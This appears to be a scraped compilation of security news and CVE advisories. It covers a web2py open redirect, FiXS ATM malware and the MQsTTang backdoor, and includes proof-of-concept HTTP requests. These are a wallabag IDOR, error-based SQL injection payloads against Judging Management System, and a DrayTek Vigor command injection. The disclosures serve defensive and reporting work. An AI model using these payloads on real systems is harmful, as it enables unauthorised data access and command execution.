Categories: News
The most interesting security related news from the week of February 27 to March 5.



(Read more...)




The post A week in security (February 27 - March 5) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (February 27 - March 5)

Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.

**web2pyTM Download**

For Python 3.7

For Python 2.7

For Testers

For Developers

Windows binaries

Windows binaries

Windows binaries

Git Repository

Mac binaries

Mac binaries

Mac binaries

Manual

Source Code

Source Code

Source Code

Source code docs

Change Log

Report a Bug

The source code version works on Windows and most Unix systems, including **Linux**, **BSD** and **Mac** . It requires Python 3.5+ (recommended for new projects) or Python 2.7+ (stable, for use with legacy apps) already installed on your system.

There are also binary packages for Windows and MacOs. They include the Python interpreter version 3.7.4 or 2.7.16, so you do not need to have it pre-installed.

**Instructions**

With the binary packages, after download, just unzip it and then click on web2py.exe (Windows) or web2py (MacOs).

Note that on recent MacOs versions (10.12+) you could face problems in running the binary App program, due to the last changes to the security settings. In this case, press the 'control' key + click on downloaded file and then 'open' it (confirm the warnings). Finally move the program in Applications and run it from there.

If you prefer to run it from source with your own Python interpreter already installed, type:

or for more info type:

**Caveats**

After installation, every time you run it, web2py asks you to choose a password. This password is your administrative password. If the password is left blank, the administrative interface is disabled. The administrative interface /admin/default/index is only accessible via localhost and always requires a password.

Any url /a/b/c maps into a call to application a, controller b.py and function c in that controller.

You are strongly advised to also use Apache with mod\_proxy or mod\_wsgi to access applications in the framework. This allows better security and concurrency.

**License**

Web2py code is released under LGPLv3 License. This license does not extend to third party libraries distributed with web2py (which can be MIT, BSD or Apache type licenses) nor does it extend to applications built with web2py (under the terms of the LGPL.

Applications built with web2py can be released under any license the author wishes as long as they do not contain web2py code. They can link unmodified web2py libraries and they can be distributed with official web2py binaries. In particular web2py applications can be distributed in closed source. The admin interface provides a button to byte-code compile.

It is fine to distribute web2py (source or compiled) with your applications as long as you make it clear in the license where your application ends and web2py starts.

web2py is copyrighted by Massimo Di Pierro. The web2py trademark is owned by Massimo Di Pierro.

read more

**Artwork**

  

**Stickers**

       

Download WEB2PY artwork pack in editable .png format

Logo, Stickers and Layout developed by José V. Sousa and Bruno Rocha (at Blouweb) All rights reserved by Massimo Di Pierro © 2023

Favicon and HTML5 compatibility by Martin Mulone

Icon set made by Christian Burprich licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 License

CVE-2023-22432

Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.4.

**Description**

IDOR Vulnerability Allows add tag entry user other, allows adding tags to any user, since there is no user authentication. And not limiting the input causes the entry interface to break

**Proof of Concept**

Step 1. User A manages entry id 6

Step 2. User B manages entry id 7

Step 3. Login user A, add tag for this user entry

eg: demo user A

    POST /new-tag/6 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 4. Change the ID to 7, now you can add a tag to the user's entry

    POST /new-tag/7 HTTP/1.1
    Host: localhost
    Content-Length: 85
    Cache-Control: max-age=0
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/view/6
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: security_level=0; PHPSESSID=55d2bbe519f7c1f342384481e630a78a; REMEMBERME=V2FsbGFiYWdcVXNlckJ1bmRsZVxFbnRpdHlcVXNlcjpaSFY1YkdzPToxNzA2OTQxNTMzOjk3YmY0ZDdmYzFjNzQwZTdiMzZjYWEzOGM5ZjA1MzhjMTlkOTNiMGM0NjgzN2MwOTIzM2NhNGIxZGU4N2FmYWI%3D
    Connection: close
    
    tag[label]=demoidor&tag[add]=&tag[_token]=Zqf_ZVhMZ9bUpJaC-y3kbskI1GtKRuIs5mWOqogaAVM
    

Step 5. Input value is not limited, then input character > 200 makes the interface broken

**Impact**

an attacker add tag by user other, interface broken

CVE-2023-0734: IDOR Vulnerability Allows add tag entry user other in wallabag

A new ATM malware strain dubbed FiXS has been observed targeting Mexican banks since the start of February 2023.
"The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News.
Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is

Banking Security / Cyber Crime

A new ATM malware strain dubbed **FiXS** has been observed targeting Mexican banks since the start of February 2023.

"The ATM malware is hidden inside another not-malicious-looking program," Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News.

Besides requiring interaction via an external keyboard, the Windows-based ATM malware is also vendor-agnostic and is capable of infecting any teller machine that supports CEN/XFS (short for eXtensions for Financial Services).

The exact mode of compromise remains unknown but Metabase Q's Dan Regalado told The Hacker News that it's likely that "attackers found a way to interact with the ATM via touchscreen."

FiXS is also said to be similar to another strain of ATM malware codenamed Ploutus that has enabled cybercriminals to extract cash from ATMs by using an external keyboard or by sending an SMS message.

One of the notable characteristics of FiXS is its ability to dispense money 30 minutes after the last ATM reboot by leveraging the Windows GetTickCount API.

The sample analyzed by Metabase Q is delivered via a dropper known as Neshta (conhost.exe), a file infector virus that's coded in Delphi and which was initially observed in 2003.

"FiXS is implemented with the CEN XFS APIs which helps to run mostly on every Windows-based ATM with little adjustments, similar to other malware like RIPPER," the cybersecurity company said. "The way FiXS interacts with the criminal is via an external keyboard."

With this development, FiXS becomes the latest in a long list of malware such as Ploutus, Prilex, SUCEFUL, GreenDispenser, RIPPER, Alice, ATMitch, Skimer, and ATMii that have targeted ATMs to siphon money.

Prilex has since also evolved into a modular point-of-sale (PoS) malware to perform credit card fraud through a variety of methods, including blocking contactless payment transactions.

"Cybercriminals who compromise networks have the same end goal as those who carry out attacks via physical access: to dispense cash," Trend Micro said in a detailed report on ATM malware published in September 2017.

"However, instead of manually installing malware on ATMs through USB or CD, the criminals would not need to go to the machines anymore. They have standby money mules that would pick up the cash and go."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New FiXS ATM Malware Targeting Mexican Banks

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 24 and March 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup (Feb. 24 - March 3)

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the sid parameter at /php-jms/updateBlankTxtview.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: XZY0193

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/updateBlankTxtview.php?sid=

Vulnerability location: /php-jms/updateBlankTxtview.php?sid=, sid

dbname =jms\_db

\[+\] Payload: /php-jms/updateBlankTxtview.php?sid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> sid

GET /php\-jms/updateBlankTxtview.php?sid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-24643: mycve/SQLi-3.md at main · 594238758/mycve

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the sid parameter at /php-jms/updateTxtview.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: XZY0193

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/updateTxtview.php?sid=

Vulnerability location: /php-jms/updateTxtview.php?sid=, sid

dbname =jms\_db

\[+\] Payload: /php-jms/updateTxtview.php?sid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> sid

GET /php\-jms/updateTxtview.php?sid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-24642: mycve/SQLi-2.md at main · 594238758/mycve

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the sid parameter at /php-jms/updateview.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: XZY0193

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/updateview.php?sid=

Vulnerability location: /php-jms/updateview.php?sid=, sid

dbname =jms\_db

\[+\] Payload: /php-jms/updateview.php?sid=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> sid

GET /php\-jms/updateview.php?sid\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: close

CVE-2023-24641: mycve/SQLi-1.md at main · 594238758/mycve

By Deeba Ahmed
The new MQTTang backdoor is capable of evading detection, making it an even bigger threat to victims.
This is a post from HackRead.com Read the original post: Chinese Hackers Unleashes MQsTTang Backdoor Against Govt Entities

The hacker group behind this campaign is the notorious Chinese APT group called Mustang Panda, while the prime targets of the attack are government and political organizations across Asia and Europe.

**Mustang Panda**, a notorious Chinese APT group, has reportedly deployed a new, custom backdoor dubbed MQsTTang. Slovak cybersecurity firm ESET has analyzed this campaign that started in early 2021.

According to ESET researcher Alexandre C.T. Cyr MQsTTang, a previously unseen custom backdoor was used in a social engineering campaign that started in January 2023.

This backdoor isn’t based on any existing family of malware or publicly available projects. ESET stated that attackers have used decoy filenames that align with their previous campaigns targeting European political organizations.

**Who are the Targets?**

ESET assessed that attackers are targeting unknown identities in Australia and Bulgaria. They have also focused on entities in Asia and Europe; a **government institution in Taiwan** is among the targets. According to the researchers, this campaign is still ongoing.

**About Mustang Panda**

This cyber-espionage group is also known as “Bronze President” and “TA416.” They usually rely on customized Korplug variants or **PlugX** and intricate loading chains. In this case, however, the group has used an unusual tactic by creating malware with just one stage and no obfuscation techniques.

Mustang Panda has targeted organizations across the globe and stolen data using their custom RAT, PlugX. However, this time, Mustang Panda developed the MQsTTang backdoor malware to make detection more difficult and attribution harder. In addition, the group has started using other custom tools, such as PUBLOAD, TONESHELL, and TONEINS.

**How Does the Attack Work?**

The malware has been characterized as a bare-bones backdoor, which allows the attacker to execute remote commands on the compromised device. MQTTang is distributed via spear-phishing emails, and payloads are downloaded **through GitHub repositories** created by a user associated with previously-discovered campaigns of this APT group.

The MQsTTang executable is compressed in RAR archives and named after a diplomatic theme, such as passport scans of the embassy and diplomatic mission personnel. When launched, the malware creates a copy of itself with a command-line argument to perform tasks such as enabling C2 communications or ensuring persistence.

An unusual thing about MQsTTang is that it uses the MQTT protocol for C2 communications to maintain resilience to C2 takedowns, hide infrastructure the hackers used through involving a broker for passing communications, and check for debuggers/monitoring tools to evade detection, etc.

“This new MQsTTang backdoor provides a kind of remote shell without any of the bells and whistles associated with the group’s other malware families,” ESET’s **report** read.

1.  **Chinese Hackers Exploiting Log4j Vulnerability**
2.  **Windows, Linux and macOS Targeted by Chinese**
3.  **Chinese Hackers Hit Group-IB Cybersecurity Firm**
4.  **Chinese Hackers Hiding Malware in Windows Logo**
5.  **Chinese Hackers Distributing Nim language Malware**

Chinese Hackers Unleashes MQsTTang Backdoor Against Govt Entities

A vulnerability, which was classified as critical, was found in DrayTek Vigor 2960 1.5.1.4. Affected is the function sub_1225C of the file mainfunction.cgi. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-222258 is the identifier assigned to this vulnerability.

This vulnerability is in function sub\_1225C, file mainfunction.cgi. It does not filter var password, so we can achieve command injection.

    POST /cgi-bin/mainfunction.cgi/trustcaupload HTTP/1.1
    Host: xxxxx
    Content-Length: 423
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: xxxxx
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBtX2IODkwu3BgXtR
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,
    image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: xxxxx
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Cookie: lang=en; SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
    Connection: close
    ------WebKitFormBoundaryBtX2IODkwu3BgXtR
    Content-Disposition: form-data; name="selectfile"; filename="hack.pem"
    Content-Type: application/x-compressed
    hack
    ------WebKitFormBoundaryBtX2IODkwu3BgXtR
    Content-Disposition: form-data; name="select"
    11111
    ------WebKitFormBoundaryBtX2IODkwu3BgXtR
    Content-Disposition: form-data; name="password"
    1'&& touch /tmp/hacked;'
    ------WebKitFormBoundaryBtX2IODkwu3BgXtR--

Tag

#windows